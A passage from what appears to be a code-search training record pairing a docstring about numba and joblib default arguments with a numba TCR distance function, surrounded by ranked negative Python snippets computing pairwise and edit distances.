sys.stdout.flush()\n\n for j in range(i + 1, nrow):\n self.dist_matrix[i,j] = self._pairwise_dist(self.data_vector[i],self.data_vector[j])\n self.dist_matrix[j,i] = self.dist_matrix[i,j]\n \n self.dist_frame = pd.DataFrame(self.dist_matrix,\n index = self.seq_strings,\n columns = self.seq_strings)", "def pairwise_distances(embeddings, squared=False):\n dot_product = tf.matmul(embeddings, tf.transpose(embeddings))\n square_norm = tf.diag_part(dot_product)\n\n # ||a - b||^2 = ||a||^2 - 2 <a, b> + ||b||^2\n # shape (batch_size, batch_size)\n distances = tf.expand_dims(square_norm, 1) - 2.0 * \\\n dot_product + tf.expand_dims(square_norm, 0)\n\n distances = tf.maximum(distances, 0.0)\n\n if not squared:\n mask = tf.to_float(tf.equal(distances, 0.0))\n distances = distances + mask * 1e-16\n distances = tf.sqrt(distances)\n distances = distances * (1.0 - mask)\n\n return distances", "def test_distances(self):\n sf = make_classifier_data(n=10, d=2, seed=37)\n sf.remove_column(\"class\", inplace=True)\n\n numeric_features = [\"int0\", \"int1\", \"float0\", \"float1\"]\n array_features = [\"array0\"]\n string_features = [\"str0\"]\n dict_features = [\"dict0\"]\n\n ## Numeric standard distances should work for numeric columns\n for d in [\n \"euclidean\",\n \"squared_euclidean\",\n \"manhattan\",\n \"cosine\",\n \"transformed_dot_product\",\n ]:\n try:\n m = tc.dbscan.create(\n sf,\n features=numeric_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n ## Numeric standard distances should work for array columns\n for d in [\n \"euclidean\",\n \"squared_euclidean\",\n \"manhattan\",\n \"cosine\",\n \"transformed_dot_product\",\n ]:\n try:\n m = tc.dbscan.create(\n sf,\n features=array_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n ## String standard distances should work.\n for d in [\"levenshtein\"]:\n try:\n m = tc.dbscan.create(\n sf,\n features=string_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n ## Dictionary standard distances should work.\n for d in [\"jaccard\", \"weighted_jaccard\", \"cosine\", \"transformed_dot_product\"]:\n try:\n m = tc.dbscan.create(\n sf,\n features=dict_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n # Nonsensical combinations of feature types and distances should fail.\n with self.assertRaises(ValueError):\n m = tc.dbscan.create(\n sf,\n features=numeric_features,\n distance=\"levenshtein\",\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n\n with self.assertRaises(ToolkitError):\n m = tc.dbscan.create(\n sf,\n features=dict_features,\n distance=\"levenshtein\",\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n\n with self.assertRaises(ToolkitError):\n m = tc.dbscan.create(\n sf,\n features=string_features,\n distance=\"euclidean\",\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n\n # If no distance is specified, the automatic distance construction\n # should kick in and be correct.\n correct_dist = [\n [[\"str0\"], \"levenshtein\", 1],\n [[\"str1\"], \"levenshtein\", 1],\n [[\"dict0\"], \"jaccard\", 1],\n [[\"int0\", \"int1\", \"float0\", \"float1\"], \"euclidean\", 1],\n [[\"array0\"], \"euclidean\", 1],\n ]\n\n m = tc.dbscan.create(\n sf, radius=1, distance=None, min_core_neighbors=3, verbose=False\n )\n\n self.assertItemsEqual(m.distance, correct_dist)\n\n m = tc.dbscan.create(\n sf, radius=1, distance=\"auto\", min_core_neighbors=3, verbose=False\n )\n self.assertItemsEqual(m.distance, correct_dist)", "def nb_editdistance(seq_vec1, seq_vec2, distance_matrix=identity_nb_distance_matrix, gap_penalty=1):\n \n q_L = seq_vec1.shape[0]\n s_L = seq_vec2.shape[0]\n if q_L == s_L:\n \"\"\"No gaps: substitution distance\n This will make it differ from a strict edit-distance since\n the optimal edit-distance may insert same number of gaps in both sequences\"\"\"\n dist = 0\n for i in range(q_L):\n dist += distance_matrix[seq_vec1[i], seq_vec2[i]]\n return dist\n\n ldmat = np.zeros((q_L, s_L), dtype=np.int16)\n for row in range(1, q_L):\n ldmat[row, 0] = row * gap_penalty\n\n for col in range(1, s_L):\n ldmat[0, col] = col * gap_penalty\n \n for col in range(1, s_L):\n for row in range(1, q_L):\n ldmat[row, col] = min(ldmat[row-1, col] + gap_penalty,\n ldmat[row, col-1] + gap_penalty,\n ldmat[row-1, col-1] + distance_matrix[seq_vec1[row-1], seq_vec2[col-1]]) # substitution\n return ldmat[row, col]", "def edit_distance(s1, s2, transpositions=False):\r\n # set up a 2-D array\r\n len1 = len(s1)\r\n len2 = len(s2)\r\n lev = _edit_dist_init(len1 + 1, len2 + 1)\r\n\r\n # iterate over the array\r\n for i in range(len1):\r\n for j in range(len2):\r\n _edit_dist_step(lev, i + 1, j + 1, s1, s2, transpositions=transpositions)\r\n return lev[len1][len2]", "def _evaluate_seq_distance(self, log_data, simulation_data, metric):\n similarity = list()\n def pbar_async(p, msg):\n pbar = tqdm(total=reps, desc=msg)\n processed = 0\n while not p.ready():\n cprocesed = (reps - p._number_left)\n if processed < cprocesed:\n increment = cprocesed - processed\n pbar.update(n=increment)\n processed = cprocesed\n time.sleep(1)\n pbar.update(n=(reps - processed))\n p.wait()\n pbar.close()\n # define the type of processing sequencial or parallel\n cases = len(set([x['caseid'] for x in log_data]))\n if cases <= self.max_cases:\n args = (metric, simulation_data, log_data,\n self.alpha_concurrency.oracle,\n ({'min': 0, 'max': len(simulation_data)},\n {'min': 0, 'max': len(log_data)}))\n df_matrix = self._compare_traces(args)\n else:\n cpu_count = multiprocessing.cpu_count()\n mx_len = len(log_data)\n ranges = self.define_ranges(mx_len, int(np.ceil(cpu_count/2)))\n ranges = list(itertools.product(*[ranges, ranges]))\n reps = len(ranges)\n pool = Pool(processes=cpu_count)\n # Generate\n args = [(metric, simulation_data[r[0]['min']:r[0]['max']],\n log_data[r[1]['min']:r[1]['max']],\n self.alpha_concurrency.oracle,\n r) for r in ranges]\n p = pool.map_async(self._compare_traces, args)\n if self.verbose:\n pbar_async(p, 'evaluating '+metric+':')\n pool.close()\n # Save results\n df_matrix = pd.concat(list(p.get()), axis=0, ignore_index=True)\n df_matrix.sort_values(by=['i', 'j'], inplace=True)\n df_matrix = df_matrix.reset_index().set_index(['i','j'])\n if metric == 'dl_mae':\n dl_matrix = df_matrix[['dl_distance']].unstack().to_numpy()\n mae_matrix = df_matrix[['mae_distance']].unstack().to_numpy()\n # MAE normalized\n max_mae = mae_matrix.max()\n mae_matrix = np.divide(mae_matrix, max_mae)\n # multiple both matrixes by Beta equal to 0.5\n dl_matrix = np.multiply(dl_matrix, 0.5)\n mae_matrix = np.multiply(mae_matrix, 0.5)\n # add each point in between\n cost_matrix = np.add(dl_matrix, mae_matrix)\n else:\n cost_matrix = df_matrix[['distance']].unstack().to_numpy()\n row_ind, col_ind = linear_sum_assignment(np.array(cost_matrix))\n # Create response\n for idx, idy in zip(row_ind, col_ind):\n similarity.append(dict(caseid=simulation_data[idx]['caseid'],\n sim_order=simulation_data[idx]['profile'],\n log_order=log_data[idy]['profile'],\n sim_score= (cost_matrix[idx][idy]\n if metric == 'mae' else\n (1-(cost_matrix[idx][idy])))\n )\n )\n return similarity", "def _calc_distances(preds, targets, mask, normalize):\n N, K, _ = preds.shape\n _mask = mask.copy()\n _mask[np.where((normalize == 0).sum(1))[0], :] = False\n distances = np.full((N, K), -1, dtype=np.float32)\n normalize[np.where(normalize <= 0)] = 1000000.0\n distances[_mask] = np.linalg.norm(((preds - targets) / normalize[:, None, :])[_mask], axis=-1)\n return distances.T", "def compute_euclidean_distance_matrix(locations):\n distances = {}\n distances_df=get_times(locations)\n print(distances_df)\n print(distances_df.iloc[0,0])\n print(distances_df.iloc[0,1])\n print(distances_df.iloc[0,2])\n for from_counter, from_node in enumerate(locations):\n distances[from_counter] = {}\n for to_counter, to_node in enumerate(locations):\n distances[from_counter][to_counter] = (int(\n distances_df.iloc[from_counter,to_counter]))\n return distances", "def cmc(distmat, glabels=None, plabels=None, ds=None, repeat=None):\n m, n = distmat.shape\n if glabels is None and plabels is None:\n glabels = np.arange(0, m)\n plabels = np.arange(0, n)\n if isinstance(glabels, list):\n glabels = np.asarray(glabels)\n if isinstance(plabels, list):\n plabels = np.asarray(plabels)\n ug = np.unique(glabels)\n if ds is None:\n ds = ug.size\n if repeat is None:\n if ds == ug.size and ug.size == len(glabels):\n repeat = 1\n else:\n repeat = 100\n\n ret = 0\n for __ in xrange(repeat):\n # Randomly select gallery labels\n G = np.random.choice(ug, ds, replace=False)\n # Select corresponding probe samples\n p_inds = [i for i in xrange(len(plabels)) if plabels[i] in G]\n P = plabels[p_inds]\n # Randomly select one gallery sample per label selected\n D = np.zeros((ds, P.size))\n for i, g in enumerate(G):\n samples = np.where(glabels == g)[0]\n j = np.random.choice(samples)\n D[i, :] = distmat[j, p_inds]\n # Compute CMC\n ret += _cmc_core(D, G, P)\n return ret / repeat", "def distance_matrix(n_row, n_col):\n\n n_pop = int(n_row * n_col)\n center = int(n_row/2*(n_col+1))\n\n pop_idx = np.arange(n_pop)\n pop_idx_col = np.remainder(pop_idx, n_col)\n pop_idx_row = pop_idx // n_row\n\n pos = np.vstack((pop_idx_col,pop_idx_row)).T\n distance = spa.distance.cdist([pos[center]], pos)[0]\n\n return distance", "def distance_matrix(sunspots1, sunspots2):\n \n N1 = len(sunspots1)\n N2 = len(sunspots2)\n\n distance_matrix = np.zeros((N1, N2))\n\n for i in list(range(N1)):\n for j in list(range(N2)):\n\n distance_matrix[i, j] = euclidean_dist(sunspots1[i], sunspots2[j])\n\n return distance_matrix", "def distance(sig):\n df_sig = np.diff(sig)\n return np.sum([np.sqrt(1+df**2) for df in df_sig])", "def _pairwise_dist(cx, cy, p=2, _pow_flag=False):\n def _are_equal(cx, cy):\n if cx is cy:\n return True\n return torch.equal(cx, cy)\n\n res = None\n m = cx.size(0)\n n = cy.size(0)\n imsize = cx.view(m, -1).size(-1)\n cx_eq_cy = _are_equal(cx, cy)\n\n if cx_eq_cy:\n # logger.debug(\"Calc pairwise distance with pytorch.pdist.\")\n # Calculate only triangular, fast, cheaper, stable. Looks like this:\n # torch.cat([torch.full((n - i - 1,), i, dtype=torch.int64) for i in range(n)])\n res = F.pdist(cx.view(m, -1), p=p)\n elif p == 2 and m * n * imsize * (torch.finfo(cx.dtype).bits // 8) > 4 * 1024**2:\n # logger.debug(\"Calc pairwise distance with quadratic expansion.\")\n # If more than 4MB needed to repr a full matrix\n # Faster and cheaper, but less stable (quadratic expansion)\n # Still slower than the first choice\n cx_ = cx.view(m, -1)\n cy_ = cy.view(n, -1)\n cx_norm = cx_.pow(2).sum(dim=-1, keepdim=True)\n cy_norm = cy_.pow(2).sum(dim=-1, keepdim=True).transpose(-2, -1)\n res = cx_norm + cy_norm - 2 * cx_.matmul(cy_.transpose(-2, -1))\n\n if cx_eq_cy:\n # Ensure zero diagonal\n diag_inds = torch.arange(m)\n res[diag_inds, diag_inds] = 0\n\n # Zero out negative values\n res.clamp_min_(0)\n if _pow_flag:\n _pow_flag[0] = True\n else:\n res = res.sqrt()\n else:\n # logger.debug(\"Calc pairwise distance with naive broadcasting.\")\n # More expensive - Θ(n^2 d), but numerically more stable\n cx_ = cx.view(m, 1, -1)\n cy_ = cy.view(1, n, -1)\n # XXX does not support broadcasting yet #15918 and #15901\n # res = F.pairwise_distance(cx_, cy_, p=p, eps=1e-8)\n res = torch.norm(cx_ - cy_, p=p, dim=-1)\n\n return res", "def manhattan_distance(index1=(), index2=()):\r\n md = 0\r\n for a1, a2 in zip(index1, index2):\r\n md += abs(a1-a2)\r\n return md", "def distance_neighbors(coords, pairs):\n \n # source nodes coordinates\n c0 = coords[pairs[:,0]]\n # target nodes coordinates\n c1 = coords[pairs[:,1]]\n distances = (c0 - c1)**2\n distances = np.sqrt(distances.sum(axis=1))\n return distances", "def euclidean_distance(pid_series, series_was_shifted_to, norm=False, acc=False):\n pids = pid_series.keys()\n pids.sort()\n series = pid_series.values()\n if acc:\n series = [accumulate_series(s) for s in series]\n if norm:\n series = [normalise_series(s) for s in series]\n\n N = len(pids)\n dist_matrix = np.zeros((N, N))\n # max_distance = 0\n for i in range(N):\n for j in range(N):\n if i <= j:\n continue\n dist_vector = __get_euclidean__(series[i], series[j], series_was_shifted_to)\n # max_distance = max(max_distance, np.max(dist_vector))\n eucl = np.average(dist_vector)\n dist_matrix[i, j] = eucl\n dist_matrix[j, i] = eucl\n\n # dist_matrix = np.round(np.true_divide(dist_matrix, max_distance), decimals=round_to_decimals)\n df = pd.DataFrame(dist_matrix, index=pids, columns=pids)\n return df", "def test_get_adjacent_distances(self):\r\n dm_str = [\"\\ts1\\ts2\\ts3\", \"s1\\t0\\t2\\t4\", \"s2\\t2\\t0\\t3.2\",\r\n \"s3\\t4\\t3.2\\t0\"]\r\n dm_header, dm = parse_distmat(dm_str)\r\n # error cases: fewer than 2 valid sample ids\r\n self.assertRaises(ValueError,\r\n get_adjacent_distances, dm_header, dm,\r\n [])\r\n self.assertRaises(ValueError,\r\n get_adjacent_distances, dm_header, dm,\r\n ['s1'])\r\n self.assertRaises(ValueError,\r\n get_adjacent_distances, dm_header, dm,\r\n ['s0', 's1'])\r\n self.assertRaises(ValueError,\r\n get_adjacent_distances, dm_header, dm,\r\n ['s1', 's4'])\r\n\r\n # one pair of valid distances\r\n self.assertEqual(get_adjacent_distances(dm_header, dm, ['s1', 's2']),\r\n ([2], [('s1', 's2')]))\r\n self.assertEqual(get_adjacent_distances(dm_header, dm, ['s1', 's1']),\r\n ([0], [('s1', 's1')]))\r\n self.assertEqual(get_adjacent_distances(dm_header, dm, ['s1', 's3']),\r\n ([4], [('s1', 's3')]))\r\n self.assertEqual(get_adjacent_distances(dm_header, dm, ['s2', 's3']),\r\n ([3.2], [('s2', 's3')]))\r\n\r\n # multiple valid distances\r\n self.assertEqual(get_adjacent_distances(dm_header,\r\n dm,\r\n ['s1', 's2', 's3']),\r\n ([2, 3.2], [('s1', 's2'), ('s2', 's3')]))\r\n self.assertEqual(get_adjacent_distances(dm_header,\r\n dm,\r\n ['s1', 's3', 's2', 's1']),\r\n ([4, 3.2, 2], [('s1', 's3'), ('s3', 's2'), ('s2', 's1')]))\r\n\r\n # mixed valid and invalid distances ignores invalid distances\r\n self.assertEqual(get_adjacent_distances(dm_header,\r\n dm,\r\n ['s1', 's3', 's4', 's5', 's6', 's2', 's1']),\r\n ([4, 3.2, 2], [('s1', 's3'), ('s3', 's2'), ('s2', 's1')]))\r\n # strict=True results in missing sample ids raising an error\r\n self.assertRaises(ValueError, get_adjacent_distances,\r\n dm_header,\r\n dm,\r\n ['s1',\r\n 's3',\r\n 's4',\r\n 's5',\r\n 's6',\r\n 's2',\r\n 's1'],\r\n strict=True)", "def full_matrix(ops, mut):\n \n index_mat = np.ones((len(ops),len(ops)))\n pairs = np.argwhere(np.triu(index_mat)==1)\n dist_mat = np.zeros((len(ops),len(ops)))\n distances = []\n labels = []\n\n for pair in pairs:\n mi, label = mut.distance(ops[pair[0]], ops[pair[1]])\n distances.append(mi)\n labels.append(label)\n with ProgressBar():\n distances = dask.compute(*distances)\n\n for i in range(len(labels)):\n mut.memo[labels[i]] = distances[i]", "def _dist(A, B):\n return np.sqrt(np.einsum(\"ijk->ij\", (A[:, None, :] - B) ** 2))", "def sim_hits(tmat,start_list,targ_list,ntraj = 1000, cutoff=1000):\n \n # get state names\n nstates = tmat.shape[0]\n states = array([ii for ii in range(nstates)])\n \n trajs = list()\n \n for ii in range(ntraj):\n curr = choice(start_list)\n traj = list()\n traj.append(curr)\n while curr not in targ_list:\n weights = copy(tmat[curr, :])\n curr = discrete_dist(states, weights, nn=1)\n traj.append(curr)\n \n if len(traj)>=cutoff:\n # traj=[nan]\n break\n \n trajs.append(array(traj))\n\n return trajs", "def im_dist_mat(self):\n mat = np.zeros([self.I, self.M])\n for i in range(self.I):\n for m in range(self.M):\n mat[i, m] = distance(self.I_coords[i], self.M_coords[m])\n return mat" ]
[ "0.6867072", "0.6173414", "0.61204684", "0.59654254", "0.5629023", "0.5607086", "0.55902237", "0.55837727", "0.55610365", "0.5435831", "0.54259413", "0.5407338", "0.5377603", "0.5373048", "0.5354197", "0.5333928", "0.5265103", "0.52603585", "0.5210351", "0.5201209", "0.51830506", "0.51698697", "0.51546896", "0.514426", "0.51390195", "0.5131739", "0.51274806", "0.50870544", "0.505327", "0.50357234", "0.5009534", "0.5002475", "0.49929622", "0.49885955", "0.49766785", "0.49728706", "0.49712744", "0.4963018", "0.49619463", "0.49567276", "0.49513158", "0.49455646", "0.4933334", "0.4926115", "0.49218076", "0.49096555", "0.48991317", "0.48980093", "0.4895193", "0.48939365", "0.48939365", "0.48855412", "0.4883882", "0.48784757", "0.48753184", "0.48637748", "0.4862372", "0.48613396", "0.48605168", "0.48592594", "0.48465532", "0.484196", "0.48386276", "0.4824942", "0.48233315", "0.48158476", "0.48146296", "0.48089212", "0.48037523", "0.48028302", "0.47923094", "0.47861886", "0.47856975", "0.47782168", "0.47637326", "0.47615567", "0.47587246", "0.47538388", "0.4747834", "0.47436866", "0.47411054", "0.47403446", "0.47390574", "0.47326154", "0.47299463", "0.471991", "0.47059068", "0.47020382", "0.47019684", "0.46986982", "0.46977878", "0.4685967", "0.46822035", "0.46811098", "0.46786308", "0.4677407", "0.46758848", "0.46751362", "0.46699968", "0.4668613" ]
0.6814871
1
This function works OK on its own. Wrapping it with the above python function was a workaround because joblib and multiprocessing seem to have an issue retaining default arguments with numba functions.
def _nb_vector_tcrdist(indices, seqs_mat, seqs_L, distance_matrix=tcr_nb_distance_matrix, dist_weight=3, gap_penalty=4, ntrim=3, ctrim=2, fixed_gappos=True): assert seqs_mat.shape[0] == seqs_L.shape[0] dist = np.zeros(indices.shape[0], dtype=np.int16) for ind_i in nb.prange(indices.shape[0]): query_i = indices[ind_i, 0] seq_i = indices[ind_i, 1] q_L = seqs_L[query_i] s_L = seqs_L[seq_i] if q_L == s_L: """No gaps: substitution distance""" for i in range(ntrim, q_L - ctrim): dist[ind_i] += distance_matrix[seqs_mat[query_i, i], seqs_mat[seq_i, i]] * dist_weight continue short_len = min(q_L, s_L) len_diff = abs(q_L - s_L) if fixed_gappos: min_gappos = min(6, 3 + (short_len - 5) // 2) max_gappos = min_gappos else: min_gappos = 5 max_gappos = short_len - 1 - 4 while min_gappos > max_gappos: min_gappos -= 1 max_gappos += 1 min_dist = -1 # min_count = -1 for gappos in range(min_gappos, max_gappos + 1): tmp_dist = 0 # tmp_count = 0 remainder = short_len - gappos for n_i in range(ntrim, gappos): """n_i refers to position relative to N term""" # print (n_i, shortseq[i], longseq[i], distance_matrix[shortseq[i]+longseq[i]]) tmp_dist += distance_matrix[seqs_mat[query_i, n_i], seqs_mat[seq_i, n_i]] # tmp_count += 1 #print('sequence_distance_with_gappos1:', gappos, remainder, dist[seq_i]) for c_i in range(ctrim, remainder): """c_i refers to position relative to C term, counting upwards from C term""" tmp_dist += distance_matrix[seqs_mat[query_i, q_L - 1 - c_i], seqs_mat[seq_i, s_L - 1 - c_i]] # tmp_count += 1 #print('sequence_distance_with_gappos2:', gappos, remainder, dist[seq_i]) if tmp_dist < min_dist or min_dist == -1: min_dist = tmp_dist # min_count = tmp_count if min_dist == 0: break dist[ind_i] = min_dist * dist_weight + len_diff * gap_penalty return dist
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_default_args(self):\n cfunc = njit(g)\n self.assertEqual(cfunc(1, 2, 3), g(1, 2, 3))\n self.assertEqual(cfunc(1, y=2, z=3), g(1, 2, 3))", "def __call__(self, *args, **kwargs):\n if Numba.numba_flag:\n return self.numba_fn(*args, **kwargs)\n else:\n return self.function(*args, **kwargs)", "def njit(func):\n return func", "def precompile_numba(self):\n\n t0 = time.time()\n\n # a. remember actual settings\n prev = dict()\n varnames = ['T','Nm','do_print','Nm_ret','Na_ret']\n for varname in varnames:\n prev[varname] = getattr(self.par,varname)\n\n # b. fast settings\n self.par.T = 2\n self.par.Nm_ret = 20\n self.par.Na_ret = 10\n self.par.Nm = 5\n self.par.do_print = False\n self.allocate()\n\n # c. solve\n self.solve()\n\n # d. reset\n for varname in varnames:\n setattr(self.par,varname,prev[varname]) \n\n self.allocate()\n\n if self.par.do_print:\n print(f'pre-compiled numba in {time.time()-t0:.2f} secs')", "def _make_one_arg_numba_func(func, func_args):\n try:\n func_numba = numba.jit(func, nopython=True)\n\n @numba.jit(nopython=True)\n def f(x, args=()):\n return func_numba(x, *args)\n\n # Attempt function call\n _ = f(np.array([1.0, 2.0]), func_args)\n\n return f, True\n except:\n\n def f(x, args=()):\n return func(x, *args)\n\n return f, False", "def parallel_func(func, n_jobs, verbose=None, max_nbytes='auto'):\n # for a single job, we don't need joblib\n if n_jobs == 1:\n n_jobs = 1\n my_func = func\n parallel = list\n return parallel, my_func, n_jobs\n\n try:\n from joblib import Parallel, delayed\n except ImportError:\n try:\n from sklearn.externals.joblib import Parallel, delayed\n except ImportError:\n warn('joblib not installed. Cannot run in parallel.')\n n_jobs = 1\n my_func = func\n parallel = list\n return parallel, my_func, n_jobs\n\n # check if joblib is recent enough to support memmaping\n p_args = _get_args(Parallel.__init__)\n joblib_mmap = ('temp_folder' in p_args and 'max_nbytes' in p_args)\n\n cache_dir = get_config('MNE_CACHE_DIR', None)\n if isinstance(max_nbytes, string_types) and max_nbytes == 'auto':\n max_nbytes = get_config('MNE_MEMMAP_MIN_SIZE', None)\n\n if max_nbytes is not None:\n if not joblib_mmap and cache_dir is not None:\n warn('\"MNE_CACHE_DIR\" is set but a newer version of joblib is '\n 'needed to use the memmapping pool.')\n if joblib_mmap and cache_dir is None:\n logger.info('joblib supports memapping pool but \"MNE_CACHE_DIR\" '\n 'is not set in MNE-Python config. To enable it, use, '\n 'e.g., mne.set_cache_dir(\\'/tmp/shm\\'). This will '\n 'store temporary files under /dev/shm and can result '\n 'in large memory savings.')\n\n # create keyword arguments for Parallel\n kwargs = {'verbose': 5 if logger.level <= logging.INFO else 0}\n\n if joblib_mmap:\n if cache_dir is None:\n max_nbytes = None # disable memmaping\n kwargs['temp_folder'] = cache_dir\n kwargs['max_nbytes'] = max_nbytes\n\n n_jobs = check_n_jobs(n_jobs)\n parallel = Parallel(n_jobs, **kwargs)\n my_func = delayed(func)\n return parallel, my_func, n_jobs", "def test_named_args(self):\n cfunc = njit(f)\n self.assertEqual(cfunc(1, 2, 3), f(1, 2, 3))\n self.assertEqual(cfunc(1, y=2, z=3), f(1, 2, 3))", "def _make_two_arg_numba_func(func, func_args):\n try:\n func_numba = numba.jit(func, nopython=True)\n\n @numba.jit(nopython=True)\n def f(x, args=()):\n return func_numba(x, *args)\n\n # Attempt function call\n _ = f(np.array([1.0, 2.0]), np.array([1.0, 2.0]), func_args)\n\n return f, True\n except:\n\n def f(x, y, args=()):\n return func(x, y, *args)\n\n return f, False", "def generate_numba_apply_func(\n func: Callable[..., Scalar],\n nopython: bool,\n nogil: bool,\n parallel: bool,\n):\n numba_func = jit_user_function(func)\n if TYPE_CHECKING:\n import numba\n else:\n numba = import_optional_dependency(\"numba\")\n\n @numba.jit(nopython=nopython, nogil=nogil, parallel=parallel)\n def roll_apply(\n values: np.ndarray,\n begin: np.ndarray,\n end: np.ndarray,\n minimum_periods: int,\n *args: Any,\n ) -> np.ndarray:\n result = np.empty(len(begin))\n for i in numba.prange(len(result)):\n start = begin[i]\n stop = end[i]\n window = values[start:stop]\n count_nan = np.sum(np.isnan(window))\n if len(window) - count_nan >= minimum_periods:\n result[i] = numba_func(window, *args)\n else:\n result[i] = np.nan\n return result\n\n return roll_apply", "def IB(px,py,pyx_c,maxbeta=5,numbeta=30,iterations=100,restarts=3,parallel = False):\n pm_size = px.size\n bs = np.linspace(0.01,maxbeta,numbeta) #value of beta\n if parallel != False:\n pool = mp.Pool(processes=parallel)\n results = [pool.apply_async(beta_iter,args=(b,px,py,pyx_c,pm_size,restarts,iterations,)) for b in bs]\n pool.close()\n results = [p.get() for p in results]\n ips = [x[0] for x in results]\n ifs = [x[1] for x in results]\n #Values of beta may not be sorted appropriately, code below sorts ipast and ifuture according to their corresponding value of beta, and in correct order\n b_s = [x[2] for x in results] \n ips = [x for _, x in sorted(zip(b_s,ips))]\n ifs = [x for _, x in sorted(zip(b_s,ifs))]\n elif parallel == False:\n\t ips = np.zeros(bs.size)\n\t ifs = np.zeros(bs.size)\n\t for bi in range(bs.size):\n\t\t candidates = []\n\t\t for r in range(restarts):\n\t\t\t # initialize distribution for bottleneck variable\n\t\t\t pm = np.random.rand(pm_size)+1\n\t\t\t pm /= pm.sum()\n\t\t\t pym_c = np.random.rand(py.size,pm.size)+1 # Starting point for the algorithm\n\t\t\t pym_c /= pym_c.sum(axis=0)\n\t\t\t\t# iterate the BA algorithm\n\t\t\t for i in range(iterations):\n\t\t\t\t pmx_c, z = p_mx_c(pm,px,py,pyx_c,pym_c,bs[bi])\n\t\t\t\t pm = p_m(pmx_c,px)\n\t\t\t\t pym_c = p_ym_c(pm,px,py,pyx_c,pmx_c)\n\t\t\t\t if i>0 and np.allclose(pmx_c,pmx_c_old,rtol=1e-3,atol=1e-3):\n\t\t\t\t\t\t# if the x->m mapping is not updating any more, we're at convergence and we can stop\n\t\t\t\t\t break\n\t\t\t\t pmx_c_old = pmx_c\n\t\t\t candidates.append({'past_info' : mi_x1x2_c(pm, px, pmx_c),\n\t\t\t\t\t\t\t\t 'future_info' : mi_x1x2_c(py, pm, pym_c),\n\t\t\t\t\t\t\t\t 'functional' : -np.log2(np.inner(z,px))})\n\t\t\t# among the restarts, select the result that gives the minimum\n\t\t\t# value for the functional we're actually minimizing (eq 29 in\n\t\t\t# Tishby et al 2000).\n\t\t selected_candidate = min(candidates, key=lambda c: c['functional'])\n\t\t ips[bi] = selected_candidate['past_info']\n\t\t ifs[bi] = selected_candidate['future_info']\n # restrict the returned values to those that, at each value of\n # beta, actually increase (for Ipast) and do not decrease (for\n # Ifuture) the information with respect to the previous value of\n # beta. This is to avoid confounds from cases where the AB\n # algorithm gets stuck in a local minimum.\n ub, bs = compute_upper_bound(ips, ifs, bs)\n ips = np.squeeze(ub[:,0])\n ifs = np.squeeze(ub[:,1])\n return ips, ifs, bs", "def paramap(func, in_list, out_shape=None, n_jobs=-1, engine=\"joblib\",\n backend=None, func_args=None, func_kwargs=None,\n **kwargs):\n\n func_args = func_args or []\n func_kwargs = func_kwargs or {}\n\n if engine == \"joblib\":\n if not has_joblib:\n raise joblib()\n if backend is None:\n backend = \"loky\"\n pp = joblib.Parallel(\n n_jobs=n_jobs, backend=backend,\n **kwargs)\n dd = joblib.delayed(func)\n d_l = [dd(ii, *func_args, **func_kwargs) for ii in in_list]\n results = pp(tqdm(d_l))\n\n elif engine == \"dask\":\n if not has_dask:\n raise dask()\n if backend is None:\n backend = \"threading\"\n\n if n_jobs == -1:\n n_jobs = multiprocessing.cpu_count()\n n_jobs = n_jobs - 1\n\n def partial(func, *args, **keywords):\n def newfunc(in_arg):\n return func(in_arg, *args, **keywords)\n return newfunc\n pp = partial(func, *func_args, **func_kwargs)\n dd = [dask.delayed(pp)(ii) for ii in in_list]\n if backend == \"multiprocessing\":\n results = dask.compute(*dd, scheduler=\"processes\",\n workers=n_jobs, **kwargs)\n elif backend == \"threading\":\n results = dask.compute(*dd, scheduler=\"threads\",\n workers=n_jobs, **kwargs)\n else:\n raise ValueError(\"%s is not a backend for dask\" % backend)\n\n if engine == \"ray\":\n if not has_ray:\n raise ray()\n\n func = ray.remote(func)\n results = ray.get([func.remote(ii, *func_args, **func_kwargs)\n for ii in in_list])\n\n elif engine == \"serial\":\n results = []\n for in_element in in_list:\n results.append(func(in_element, *func_args, **func_kwargs))\n\n if out_shape is not None:\n return np.array(results).reshape(out_shape)\n else:\n return results", "def __call__(self, *args, **kwargs):\n dprint(2, \"FunctionMetadata::__call__\", self.func.__name__, args, kwargs, self.numba_args)\n atypes = tuple([type(x) for x in args])\n try_again = True\n count = 0\n if not self.numba_pfunc:\n if len(self.numba_args) == 0 and not self.no_global_cache:\n self.numba_pfunc = get_fm(FillerFunc(self.func), True)\n self.numba_func = get_fm(FillerFunc(self.func), False)\n else:\n self.numba_pfunc = numba.njit(parallel=True, **self.numba_args)(self.func)\n self.numba_func = numba.njit(**self.numba_args)(self.func)\n\n if gpu_present:\n dprint(1, \"using gpu context\")\n\n with dpctl.device_context(\"level0:gpu\"):\n while try_again and count < 2:\n count += 1\n try_again = False\n if self.ngfunc.get(atypes, True):\n try:\n ret = self.numba_pfunc(*args, **kwargs)\n self.ngfunc[atypes] = True\n return ret\n except numba.core.errors.TypingError as te:\n tetxt = str(te)\n tesplit = tetxt.splitlines()\n for teline in tesplit:\n if \"Untyped global name\" in teline and \"ramba.StencilMetadata\" in teline:\n try_again = True\n # Name of global that is of type ramba.StencilMetadata\n tes = teline[21:].split()[0][:-2]\n outer_globals = self.func.__globals__\n outer_locals = {}\n etes = eval(tes, outer_globals, outer_locals)\n etes.compile() # Converts to a Numba StencilFunc\n outer_globals[tes] = etes.sfunc # Rewrite the global to the Numba StencilFunc\n self.numba_pfunc = numba.njit(parallel=True, **self.numba_args)(self.func)\n self.numba_func = numba.njit(**self.numba_args)(self.func)\n if not try_again:\n self.ngfunc[atypes] = False\n dprint(1, \"Numba GPU ParallelAccelerator attempt failed.\")\n except:\n self.ngfunc[atypes] = False\n dprint(1, \"Numba GPU ParallelAccelerator attempt failed.\")\n\n while try_again and count < 2:\n count += 